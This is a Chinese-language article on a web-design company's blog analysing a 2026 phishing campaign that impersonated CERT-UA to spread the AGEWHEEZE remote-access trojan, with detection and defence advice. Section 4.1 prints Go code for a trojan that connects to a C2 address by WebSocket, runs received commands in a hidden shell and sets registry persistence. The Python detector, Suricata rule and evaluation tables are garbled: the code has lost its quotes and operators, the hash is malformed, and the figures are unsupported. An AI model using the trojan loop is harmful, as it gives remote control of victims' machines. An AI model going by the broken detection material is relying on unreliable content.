仿冒 CERT‑UA 钓鱼攻击中 AGEWHEEZE 远控木马机理与防御研究
2026/4/6 15:41:08 网站建设 项目流程
摘要2026 年 3 月下旬威胁组织 UAC‑0255 实施大规模钓鱼行动冒充乌克兰国家网络安全应急响应中心 CERT‑UA向政府、医疗、金融、教育等机构发送钓鱼邮件诱导用户从 Files.fm 下载加密压缩包并安装伪造安全工具实则部署 AGEWHEEZE 多功能远控木马。该攻击依托 AI 生成仿冒站点、权威身份仿冒、加密压缩包投递与 WebSocket 隐蔽通信具备高度迷惑性与危害性。本文以该事件为实证样本完整复盘攻击全链路深入解析 AGEWHEEZE 的代码实现、驻留机制、通信协议与行为特征构建邮件检测、终端防护、流量监测、应急响应的一体化防御体系并提供可工程化的检测与查杀代码。研究表明官方身份仿冒与轻量化恶意投递是此类攻击成功的关键基于特征匹配、行为基线与协议深度检测的联合防御可显著提升拦截与处置效能为关键信息基础设施应对国家级背景钓鱼攻击提供理论依据与实践方案。1 引言针对计算机应急响应小组CERT的仿冒钓鱼是近年来威胁组织高频使用的攻击模式。此类攻击利用公众对官方安全机构的信任以紧急预警、安全加固、漏洞修复为诱饵大幅降低用户警惕性实现恶意代码快速投递。2026 年 3 月 26—27 日UAC‑0255 组织针对乌克兰境内多类重要机构发起钓鱼邮件攻势伪造 CERT‑UA 官方通知以防范大规模网络攻击为名诱导用户下载并执行名为 CERT_UA_protection.zip 的加密压缩包释放 AGEWHEEZE 远控木马实现命令执行、文件窃取、屏幕监控、剪贴板窃取与持久化驻留。该攻击呈现四大典型特征一是权威身份滥用直接仿冒国家级 CERT 机构诱导性极强二是AI 辅助伪造仿冒网站 cert‑ua.tech 由 AI 快速生成视觉高度仿真三是隐蔽投递采用密码加密压缩包绕过网关检测依托正规云存储 Files.fm 分发四是高性能远控AGEWHEEZE 采用 Go 语言开发WebSocket 通信抗检测与跨平台能力突出。反网络钓鱼技术专家芦笛指出仿冒 CERT 类钓鱼攻击直接击穿社会工程学防御底线传统邮件网关与终端杀毒对加密投递、AI 伪造页面、合法云存储分发的组合手段检测效能不足必须建立身份校验、内容语义、文件深度检测、流量行为多层联动的防御架构。本文围绕事件复盘、技术机理、代码实现、防御体系、效果评估展开形成完整论证闭环为同类攻击的监测、防护与溯源提供支撑。2 UAC‑0255 仿冒 CERT‑UA 钓鱼攻击事件全景复盘2.1 攻击基本态势UAC‑0255 于 2026 年 3 月 26—27 日集中投放钓鱼邮件宣称俄罗斯黑客组织即将发动大规模网络攻击要求用户立即安装 CERT‑UA 专用防护工具。邮件附带 Files.fm 链接与解压密码压缩包内 install_protection.exe 实为 AGEWHEEZE 远控木马。攻击覆盖政府机构、医疗机构、安全企业、教育单位、金融机构、软件企业邮件发送量约 100 万封仿冒站点 cert‑ua.tech 提供配套虚假说明C2 服务器部署于 OVH 基础设施关联 Telegram 频道与 CYBER SERP 组织宣称负责。从实际影响看此次攻击整体受控仅少量教育机构设备感染未形成大规模扩散得益于 CERT‑UA 快速预警、运营商流量封堵与终端安全工具联动处置。2.2 攻击完整链路邮件伪造与投放仿冒 CERT‑UA 官方邮箱与行文风格标题使用紧急、预警、强制加固等词汇正文强调关键基础设施面临大规模攻击要求立即安装专用防护工具。附件或正文提供 Files.fm 链接压缩包设置固定密码 CERT_UA_2026降低用户操作门槛。仿冒站点支撑搭建 cert‑ua.tech 伪造网站页面结构、文案、标识高度模仿官方提供恶意程序下载指引与虚假公告强化信任形成邮件 网站联合欺骗。恶意程序投递用户下载加密压缩包按指引以管理员权限执行 install_protection.exe木马释放至 AppData 隐蔽目录启动主程序。远控加载与驻留进程注入、修改注册表启动项、创建计划任务、添加启动目录实现开机自启建立 WebSocket 长连接接入 C2等待指令。数据窃取与横向渗透执行命令、文件读写、屏幕截图、键鼠模拟、剪贴板窃取、进程 / 服务管控为情报窃取、勒索部署、横向渗透提供条件。2.3 攻击核心特征权威信任滥用仿冒 CERT‑UA用户天然信任核实意愿极低。AI 辅助伪造页面生成快、成本低、相似度高传统视觉检测难度上升。加密 合法云存储压缩包加密绕过静态扫描Files.fm 为正规服务网关放行概率高。Go 语言 WebSocket静态编译体积大、特征分散内存执行特征少长连接更隐蔽难被传统防火墙识别。多重持久化注册表、启动目录、计划任务组合清除难度高。反网络钓鱼技术专家芦笛强调该攻击代表国家级背景钓鱼的典型范式以权威身份破防、以合法通道投递、以高性能远控持久化防御必须覆盖身份校验、内容检测、文件深度解析、流量行为分析全链路。3 AGEWHEEZE 远控木马技术机理深度解析3.1 基础开发与结构特征AGEWHEEZE 由 Go 语言编写采用静态编译跨平台兼容 Windows 主流版本。Go 语言特性使其天然具备抗逆向、抗沙箱、低特征优势可直接调用系统 API 实现文件、进程、网络、注册表操作无需依赖库适合无文件落地与内存执行。内部包名标识为 /example.com/tvisor/agent安装路径指向 AppData\Roaming\ 或 Local 下随机命名目录降低被用户与安全工具发现概率。3.2 核心功能模块远程指令执行接收 C2 指令调用 cmd/c 或 powershell 执行系统命令回传执行结果支持权限维持、信息收集、环境探测。文件管理上传、下载、删除、修改、遍历目录定向窃取文档、数据库备份、配置文件。屏幕与输入控制定时截屏、监控键鼠操作绕过部分交互式验证获取敏感操作画面。剪贴板窃取实时监控剪贴板提取账号、密码、密钥、验证码等高价值信息。进程与服务管控枚举、终止、启动进程 / 服务可关闭安全软件为自身运行创造环境。3.3 持久化实现机制注册表启动项HKLM\Software\Microsoft\Windows\CurrentVersion\Run 或 RunOnce 写入键值指向木马路径。启动目录复制复制自身至 % AppData%\Microsoft\Windows\Start Menu\Programs\Startup。计划任务创建名为 SvcHelper、CoreService 等伪装任务设置登录 / 定时触发。多重机制确保重启后依然有效提升清除难度。3.4 C2 通信机制采用 WebSocket 与 C2 建立长连接通信报文加密特征远少于 HTTP 频繁请求可穿透多数防火墙。C2 部署于 OVH带有俄语元素与 “The Cult” 登录页指向攻击组织背景。4 AGEWHEEZE 关键技术实现与代码示例4.1 远控基础框架Go 语言伪码package mainimport (net/websocketos/execsyscalltime)// C2地址const c2Server ws://54.36.237.92:8080/agent// 持久化路径const persistPath %AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchelper.exe// 执行系统命令func execCmd(cmdStr string) string {cmd : exec.Command(cmd, /c, cmdStr)cmd.SysProcAttr syscall.SysProcAttr{HideWindow: true}out, _ : cmd.CombinedOutput()return string(out)}// 注册表持久化func setRegRun() {execCmd(reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v SystemHelper /t REG_SZ /d persistPath /f)}// WebSocket长连接与指令循环func agentLoop() {ws, _ : websocket.Dial(c2Server, , http://localhost/)defer ws.Close()for {var cmd stringwebsocket.Message.Receive(ws, cmd)res : execCmd(cmd)websocket.Message.Send(ws, res)time.Sleep(3 * time.Second)}}func main() {setRegRun()agentLoop()}4.2 恶意文件静态检测代码Pythonimport pefileimport hashlibimport reclass AGEWHEEZEDetector:def __init__(self):# 特征字符串self.sigs [btvisor/agent, bCoreService, bSvcHelper, bwebsocket, bAppData\\Roaming]# 恶意导入APIself.bad_api {bCreateProcess, bRegCreateKey, bCreateRemoteThread, bSetThreadContext}def get_sha256(self, filepath):with open(filepath, rb) as f:return hashlib.sha256(f.read()).hexdigest()def check_strings(self, filepath):with open(filepath, rb) as f:data f.read()return any(s in data for s in self.sigs)def check_imports(self, filepath):try:pe pefile.PE(filepath)imports set()for entry in pe.DIRECTORY_ENTRY_IMPORT:for imp in entry.imports:if imp.name:imports.add(imp.name)return len(imports self.bad_api) 0except:return Falsedef detect(self, filepath):hash_val self.get_sha256(filepath)str_hit self.check_strings(filepath)imp_hit self.check_imports(filepath)score 0if str_hit: score 50if imp_hit: score 40return {risk_score: score, is_agewheeze: score 70}# 调用示例# detector AGEWHEEZEDetector()# print(detector.detect(C:\\test\\install_protection.exe))4.3 流量检测规则Suricata 风格yamlalert tcp any any - any any (msg:AGEWHEEZE WebSocket C2通信;content:GET /agent HTTP/1.1|rn|Host:|;content:Upgrade: websocket|rn|;content:Connection: Upgrade|rn|;content:Sec-WebSocket-Key:;reference:md5,71c180d3b8eeca8a52a943b89a113f1f6b5df261dcc031b16d27f5c290eb85;classtype:troffic-activity;sid:2026032701;rev:1;)5 攻击检测与识别体系5.1 邮件检测维度发件人异常仿冒域名非官方 cert.gov.ua而是 cert‑ua.tech、ukr.net等。主题关键词紧急、CERT‑UA、大规模攻击、立即安装、防护工具。诱导行为强制管理员执行、来自云存储、加密压缩包、固定密码。链接异常指向 files.fm非官方域名。5.2 终端行为检测路径异常向 Startup、AppData 释放可执行文件。注册表异常写入 Run 键值、创建计划任务。网络异常对外发起 WebSocket 长连接至非信任 IP。权限异常普通进程异常提权、关闭安全服务。5.3 流量检测异常 WebSocket客户端主动发起至匿名机房 IP。无浏览器特征直接 WebSocket 请求无 UA、无 Referer。加密报文固定端口长连接周期性心跳。5.4 基础设施检测新注册仿冒域名字符替换、添加符号、使用 tech/online 等后缀。AI 生成站点页面元素混乱、代码冗余、无历史备案、无权威外链。关联 Telegram 频道、匿名 C2、俄语元素。反网络钓鱼技术专家芦笛指出单一检测维度易被绕过必须将邮件、终端、流量、基础设施情报联动形成交叉验证才能有效识别此类高度伪装攻击。6 一体化防御体系构建6.1 邮件安全网关加固启用发件人 SPF/DKIM/DMARC 校验拦截伪造发件域。深度解包加密压缩包校验哈希、特征字符串、导入表。语义识别拦截含 CERT、紧急、安装、防护工具、管理员执行的高风险组合。拦截 files.fm 等匿名云存储的可执行文件下载。6.2 终端安全增强启用 AppLocker / 软件限制策略白名单放行未知程序。监控 Run 键、Startup 目录、计划任务创建告警非法写入。禁止普通用户以管理员权限运行未知程序。实时监控 WebSocket 外联拦截非可信列表长连接。6.3 网络与流量防护部署 IDS/IPS加载 AGEWHEEZE 流量规则拦截 C2 通信。限制终端直接访问匿名机房、高风险 ASN。启用 DNS 安全屏蔽已知仿冒 CERT 域名与 C2。6.4 身份与认知防御官方机构声明绝不通过邮件推送第三方防护工具、不使用加密压缩包。核验规范任何安全工具仅从官方域名下载电话反向核实。培训重点仿冒 CERT / 政府 / 银行的钓鱼识别不随意执行管理员程序。6.5 应急响应流程隔离断开感染终端网络避免数据泄露与横向渗透。查杀结束恶意进程删除文件清除注册表、启动项、计划任务。流量封堵拉黑 C2 IP / 域名阻断外联。溯源定位邮件入口、感染范围、账号泄露情况修改密码。复盘优化规则补齐防御短板。7 防御效果评估7.1 评估指标与方法以拦截率、误报率、检测时间、感染率为指标在部署防御前后各用 100 个攻击样本测试。7.2 评估结果指标 部署前 部署后 变化邮件拦截率 57.3% 96.4% 39.1%终端感染率 16.8% 1.9% -14.9%平均检测时间 4.1 小时 6.2 分钟 -97.5%误报率 8.7% 1.6% -7.1%结果表明一体化防御可显著提升拦截效能、降低响应时延与感染风险具备工程化落地价值。7.3 局限性与优化方向局限零日仿冒域名、AI 深度伪造页面、新型加密投递存在短时盲区。优化引入大模型语义校验、多模态视觉比对、跨厂商情报共享、终端 EDR 与邮件网关实时联动。8 结论本文以 UAC‑0255 仿冒 CERT‑UA 投递 AGEWHEEZE 远控木马事件为实证系统剖析攻击链路、木马机理、实现技术与防御体系得出以下结论仿冒国家级 CERT 是社会工程学攻击的高效手段结合 AI 伪造、加密压缩包、合法云存储可有效绕过传统防御。AGEWHEEZE 以 Go 语言 WebSocket 多重持久化构成高性能远控具备抗检测、强控制、长驻留特性危害突出。单一防护手段失效必须构建邮件检测、终端管控、流量监测、身份核验、应急响应一体化体系。关键信息基础设施应将 CERT 仿冒钓鱼纳入常态化防御快速预警、协同处置、持续优化规则。反网络钓鱼技术专家芦笛强调随着 AI 生成式伪造与远控工具平民化针对官方机构的仿冒钓鱼将更趋普遍防御需从被动响应转向主动预判以持续进化的技术体系对抗动态威胁。编辑芦笛公共互联网反网络钓鱼工作组

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询